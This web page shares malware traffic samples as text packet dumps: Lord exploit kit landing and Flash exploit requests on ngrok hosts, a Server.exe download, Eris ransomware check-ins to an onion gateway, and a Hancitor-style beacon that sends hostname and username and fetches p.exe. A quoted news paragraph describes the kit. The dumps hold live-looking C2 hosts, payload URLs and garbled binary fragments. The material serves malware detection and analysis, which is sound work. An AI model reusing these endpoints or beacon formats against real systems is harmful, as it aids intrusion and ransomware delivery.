Text Example

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename=”Server.exe”;

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
E………..Q…
..e…..;……P……..l..Sam9..".P.s...Y.\.D3....rU......}ZZs.>.….h.(…ax….2.9…Y..A… …….-…..,..|..X.s.@. .. ].....+<.%.p!.q.DD..I..,...x.5.XL..+D... a\....iN.e.L P.B.#%p………..Cg…e…J.i.>…..t….B…..% …..K……l..2…..X.L..9.A…..U.z.$4E1..1..#?.%..I(…C..……K..x…….ax|’S.....<.6.T...e........Q:D.....e..w.....O..g".(.....J.....c…/….$,#GL..I.,.’P..9.;..uC. ….@kB.. E..p.g(0’Hu.=…….. &P..I}………….!g…n..$.(.i….,@5i.dD…..5..}..cm$#.R.. …{..L.?4…3……@Qe…b…g…N..!C….D..M.F…v.0. S.Z….. …..E=. …F.]…M.L..&.4..5..)..f.M.yE.X.h…..SP…;…….Er..?…,…..N..~?T’Q..;..hA)…”….E…-…….B^….KR.H. ..Z..M…..L8………G..8.p.S..[………0.~~….h….:.u3..U)A.H……p!..4D9.z@h.BG.V..Z-…I.,.. .p….[j…..9..i….<.=..8I….R.~. ..e..m0]..4/..0…..#….Yu….E….I…N.Y.4……..J… E.J.[).(-..QD..n..Ko…,W..>=.+610..M.=(Y/fk.Ys…f…,)……3 z@.V..)..)……..!.-9Z..O.1….u.C..Y…f{….5….J…..F…Y..8…^. .A……….#…….7/.cW………….n…L..K……...b..t.;.p..T....\.,....(,.*..y..9./..Mli.c...[...$G^.f...(..XOo...k....X.A;.1: P...mNqB....=..e... ....s..: ...'.%[.T..|7.pUG…6…..P.u…..1(ob(.!{……T..L….Tz……..I……Y….I….V..tMT..G;.k..5t.a.I.|X P:AC’.G.[..c…j…….W…u…..!2e.@…A..0Pnk…RI.8….i….
O.[……
x|u..&.@+<..T.k@D.T,…….6@.r.,.7.>..DHc….J.uB….%.Z.B…t.(4…A…X7…….@q].…B[D…cU… 2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460 E………..Q… ..e…..;……P………. 54+0………L>……7Z…..%..m..Aj…I.TB..BM……L.p…. [.. …….m….1.jc…..|)J………n…k.S.y…..a.f..#,…..~.$..G.y.*2+.G.....S.z$E..~l....4P....U.LD.0X.\.C!.\> WRl......Xr...,... ..i..4J....UEHX_....R...H$.... BP..8.M$.o..0TEH_'...U....l...ri&..l…e…”$,b….j..” .L….[.. ……[F..l.K………^..T.2…D”.?.a!B…i…
/A.&7.EPG..a.B 8….* ..D:….A…&..s$ ..’. /...0).W.2...t*..E..3Z.)..7..8B...".5..1.8.*%L1....v..A.`.5.EIX......\P..<...@.t@...QC.u8 ..C.K..t0.0..M..V.rm...) ......G#...X.iv_.)+/<..u.%I.x.p....!,yQ/..R0.G..`...60.$Q.@N.....1y.;.. .4.....j...L.Cb.,.~2.......$;t.Q...w..@...!.d...*K.@f..[:.A..V..7.........A..... ...[...BJ.#....p.....Z 5_.4.2$........ttpP..W."s....w.S.. .y.Y36.xK.......:.\.....-.....7*.... .....!p.:!...R.i#,....92.d.C.......x...".......d.V..u....),"%.h]...a0..D....\..)..@aSS!t.4..V.(..04......[...IR@..H.!.F. .k]X.?.9..$...g.R.....-.3(.I...1 ..#&.@...i...b.B\%/.6.C..g...n..tEC6.>....t.A..t.fW........ockdC.Q.f bk...5.....?s..<.<....:..eJ_.9u.,.l.R..L...3.....Q..P.\.&..EX........OJ......e$3$...v|..3.hT..&._.-..,Q..m......e.. ..Z.L..m.ziv..X......o.7..5)=ls./;s..4ia...{QKD9.}R$ (.4..f.......Q..@.C..$M,...!....R#.. `_.....4[0..d )~......wH.6.$.S<,....C...,.y.gllll........M.P.3..). ..H....EZ.o {.$..T1...u..............$......C......M..A?.l..kO.QcK.C..S........ .#.$...?.(.0.s({.p..H.QB.....L.A.........B.<.5UCa.T.k$.k..C.=diMY...!Enq.h.GH1...,.\H"...u*.Q)....|.,......L....c.. M.E. 2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460 E...........Q... ..e.....;.C....P.......q.Y,2,\..$..Dl...@6.P.......*T...u.+L....E.0.(...(..(.".... . )...X.H......`Z!`=.....M.M,..ahI\.. .]. #P.Yw...0... j .jPs...j9......8"P...S..4..\.>..W.......h...M.l.I.B.=...*i..8l..L.4..b'. .u. P..-.2 .o0...:...#p.........@....(..tg:%C...H.mZ.....!(.C.....$al_..`j....gD....H........ ..5,RL,1.-tW..pX. .... ]..."$`...!.k...p.3 L$g.6...A..=..r-._,..`...!.B.....!.bR.....pH.{.P...........C.....!t...F.X.......b.`1......A..`.)E.P....*e...,...\..w..4.]..<".H.#.Z.A4/.....0t...?yu.=...i.....m...;..A...u..r.E.......)....M..]'rH.jY $ ..%.$....-6..z E....m..#....u....4..&P.4......zO...../...(dk...\8Y.+..0%L..."...K<0<V.P3.8&.C.....iy<..!J.#.........7X ..M"..........?ghAl@ _.G.....b...q/2!y.,.........U.uI.5%h..ex, F..F..,.).jC. …4_LS..W..1j.?8+..)…J….-,.d……t@.q.. .P…….&.l..c<.05C..@…IP..i..n….,…,…tG..Y…..k2l..a. .9……hRQ{….q.{DHr..49......{D]I...w<....re.w ..9………….$..:…P..A..sV.C..T!…..7.|m..T_.U…..B…+e5B2.@.X…lDY..r.9!R?tJY2!.......dC.+n!s...... f.....&W..!...H!..4~~...L.w......R..L ..#....^0..4.h.<......\.$..Jq).( W..%T0D9.M..2@<.O..._.|4L....q...H. .>\F.._.....?("Jb.......$1...)y>a..,.......aM.....:.H.8B...a4;....V .....i x...W...:.i)%.VL.f@..C.W,.....W..Q=y..(....G..\2W..L...........*]b..q#...%2"..L...Hq...\..U ...K.$Cw.(b../Gh.XW.q..[.k%.A.W..0.&.".q)h.E<W................).#8.$2T0.I.FJ.A .{j.D".A.......8"6_L.O..>Pu/7u'bX.O.u!.....T.1.%w.:;].J........KRL.0...Ll....H(..X.I.. a..)..).H..l..w.k 2019-08-02 10:46:34.864666 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 606166:607626, ack 133, win 64240, length 1460 E...........Q... ..e.....;......P........%....0X.......y........S..@/........UA[HP[_.6kQ.h...4.<&.%.._..}\ ...._.>.,.[[<......XD.]F.N..... ........M.L..|...p ...y...Z...)...........A..{.....k[..X.i..v..i.v./...........….$. .E.8..F..I….H…..L…l..i…Y…..O.tK.D..Z..z.RF..RH.|C…0../.i…8%…%a., !’… .&…….u.D...!..h.Hh.8%..i.x…..B.5;.Q…..c$X.hY..@s=..13.0….yu.0.X..$k……J.~a…Z..>………8..$…Wi…..sX..`7.q.T.....C"pZR2E&.7#.OK.J...6. h....;..\$...$.....a..9.....L..qJ...n.H..._...<-..M[.6.....>L%....WdHg...d....^.|...&.b....]..s8...c.!qE.H....4.....W..)|...-Qg.F.(.>%...].{.n.Z.....a.e.........%Z7.v9..> 5P…..N ….D…’…1.0.0…#E…...].<..3?8….H’].L….B….8..N.RM^..)…..$p.u-……]. .7.- .@.H….c.@….7….6..6#..u…….@…V,B#-#q..:B…P.5E.P Z……..CJ..TR.x.T.x…y…..ki……….xg.x…….).P…..m.)2p.).C..5..1.~…Y..….2.”. ……E.8..|.+….9..….@.HTTP.%m.i../t5. .X.?.$.p3….W…….%l../G…d…#=..C.i…..……P9T…..;…ep.+..?…..?.p<.fP$..y..i..=.b…..Og..m….Ci..}..G.{.J!..,%.c.)..X….|.wz….G..BC…[..u.Q.A….pN….0..a…&..SB..B…I…..\Z( ….V…Iw…9j=.NDxi..$…….yk….8….a.P…5. Jx…..w!TI..0.gv..$t…..+…$…-.2’…Bt…!….E….n.H.k.. …..$……..P.#…Y..^@.j”/gHp…..j..R)z.(%-s……u.p..W.e@…^.(M ..0I…o?d\5.c…BB.@ .|d..G..*.7,..q.z!..s.l… .VD....u.0....#,...c4A..C..( ..u-..,7....%.'.j...K.(5PS_..N..9..Q...$y..t8..C ).=<.\...9.T....Yt.().!RpK..Ppy…..

2019-08-02 10:46:41.513341 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1:304, ack 1, win 64240, length 303: HTTP: POST /api/v1/check HTTP/1.1
E..W..@…..
..e..P0…P..%..>C.P….K..POST /api/v1/check HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 26
Accept-Encoding: gzip

{“uid”:”d708005f8b8c91d1″}
2019-08-02 10:46:50.050263 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 1:466, ack 304, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….I……..P0
..e.P…>C…&0P…q|..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=2ri00afk3bqb48pn4fg6sde643; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0

{“response”:””,”code”:0}

2019-08-02 10:46:50.050886 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [.], seq 304:1764, ack 466, win 63775, length 1460: HTTP: POST /api/v1/sync HTTP/1.1
E…..@…..
..e..P0…P..&0.>E.P…….POST /api/v1/sync HTTP/1.1
Host: evilnnwzczbcbi4edpi4tx3khwbnty3obfhemd5i5gbyci3hxx3k5pad.onion.pet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Length: 1844
Accept-Encoding: gzip

..6….U..!..,b.)..P...:.bao)..dW,......u._...mF...Ht..f2!d.._...Q!-P.....4.Ka".X../....)...A}.k.p.T.R(..5.....$.p.?..V.....uH........6.|"N.g...a@~w!.stwW.....K[C..8..-m..=.H*..#'0......…&..4..s..[9X:….6..g..u.
…2.X/&….h1.@I.E^’..~..z.......F5~..,.3p...$-l}.W..4? ...}7L...*|..s.(vr_.9……ys3.BH….”{Kt…L.N.Y….\3…..”Q….,2tP….k…….1…d$..#h…….<.S.r6.N_7…!’……b…H[.Lm.u.,.G..dRWPEX1.U……..i2..Z)o……I.n…/..)..C.Q……2.F[.{V…..*kQ. ^D….D…U….KI{.f.B…v…..?)….y…. ……7.z.Kq..Z.SF….k.yg”T….-…..Z.x.(…%igr.A …K.f…..D…..;.K……<.]…….C.8.0.l(B………p>-.u..~.GB..C..s.jJu.]..<.m..OgM….g..u……….5E.A……i:>……O..Rp..#?..M%...{....4@6...@.(.O....Rv.1.f{….y..Q../TB…L.SE..X.:t….J..LG}…D.Uu……….^.!.o.Qdy..3,Y…^.9…b…..9..X..Tj.
.i$f.1….A..E………1.S…j….R….5Wr…avO…..v..w2./…]3.W.>}l.1.x..3….0.<}…{“…r6);.$………..f/’…C.i.X>..s.<..B..J.fO.A.~&...H#..[.....9.8vA{....2e...T<..4Q.s. ..a)u]x|....e.\.3.h...eD.......}.M.18......U.a,E..$……..o.T.jH.dlS..SIw.4…..H…,C…7.+….j…….e.n.x..>qL.z..=.8.mly.(…oo.”……r…UK…?.4.$v.X.V
2019-08-02 10:46:50.050909 IP 10.8.2.101.49168 > 198.251.80.48.80: Flags [P.], seq 1764:2426, ack 466, win 63775, length 662: HTTP
E…..@…..
..e..P0…P..+..>E.P….~….
9`..c#.....M...>.......%...7.).....Q.._Cwj-..U..PA..Ru..^.q....0.....t"........r.g..C.n.v...o.?...gw.....}......V|....B~........._..^.l...}B..z.. -.eP.....!.r.Y.....&..^. ........sr...X.....V...'..o.........o...-v..:.G...:...../.."...&j.p..B50n+"..z......a.c.K...t.9..d.W..hc... .'....F.A._o.'^Ev....d...%.j..}.. .........V...sK....Y.........Z.c...]8..H..Vak...~Uk...*.R....}.T...$..J....Usey U..X>....a.....,..8.S..[^....q.c..>w........gi....d..LE.d......("a.. .g..HV.8\...re4. -/+?T.-C..3...a(....6.3...Z...lh.....!N(4...Pb_.}.......S.qY?...U...X...r..8... o...7..K........Gq:W..0.. ..A….`~…a8.
.,g……._&4.N….h…C.<.0..#…..}EQ.\9…….m…bT. 2019-08-02 10:46:50.050978 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 1764, win 64240, length 0
E..(.J……..P0
..e.P…>E…+.P….f..
2019-08-02 10:46:50.051038 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [.], ack 2426, win 64240, length 0
E..(.K……..P0
..e.P…>E….zP…….
2019-08-02 10:46:58.858491 IP 198.251.80.48.80 > 10.8.2.101.49168: Flags [P.], seq 466:931, ack 2426, win 64240, length 465: HTTP: HTTP/1.1 200 OK
E….N……..P0
..e.P…>E….zP…W…HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Fri, 02 Aug 2019 14:46:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Connection: keep-alive
Set-Cookie: PHPSESSID=s59ap5rdus4stk4ds1i5hfsmh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin‘s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it. 

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability.  One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs.  Source : https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
E..:.f……
..e
….x.5.&E…………..codeotso.com…..
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
E..J6…….

..e.5.x.6……………codeotso.com……………..S…
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.g@….[
..eS……Po0W3…… ..T…………..
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
E..,6……CS…
..e.P..rM..o0W4`………..
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
E..(.i@….e
..eS……Po0W4rM..P….T..
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
E….j@….~
..eS……Po0W4rM..P…….POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
E..(6……FS…
..e.P..rM..o0X.P….n..
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
E..(6……ES…
..e.P..rM..o0X.P….x..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
E..L6…….

..e.5…8..sJ………..fordifortti.ru……………..Mxs.
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.p@…..
..eMxs….PQd…….. ……………..
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
E..O6…….

..e.5…;..LS………..material-nerud.ru……………..\5. 2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0 E..,6......}Mxs. ..e.P.. DrUQd..…^.…..
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
E..(.q@…..
..eMxs….PQd..
DrVP…v…
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
E….r@…..
..eMxs….PQd..
DrVP…….POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
E..(6…….Mxs.
..e.P..
DrVQd..P…u1..
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@…..
..e\5....P.]2....... ..[.............. 2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0 E..,6.....$.\5.
..e.P…..<.]2.....p...... 2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0 E..(.t@...." ..e\5….P.]2….=P……. 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
E..n.u@…..
..e\5....P.]2....=P...7...GET /wp-includes/pomo/p.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: material-nerud.ru Connection: Keep-Alive 2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1 E..n.u@..... ..e\5….P.]2….=P…7…GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

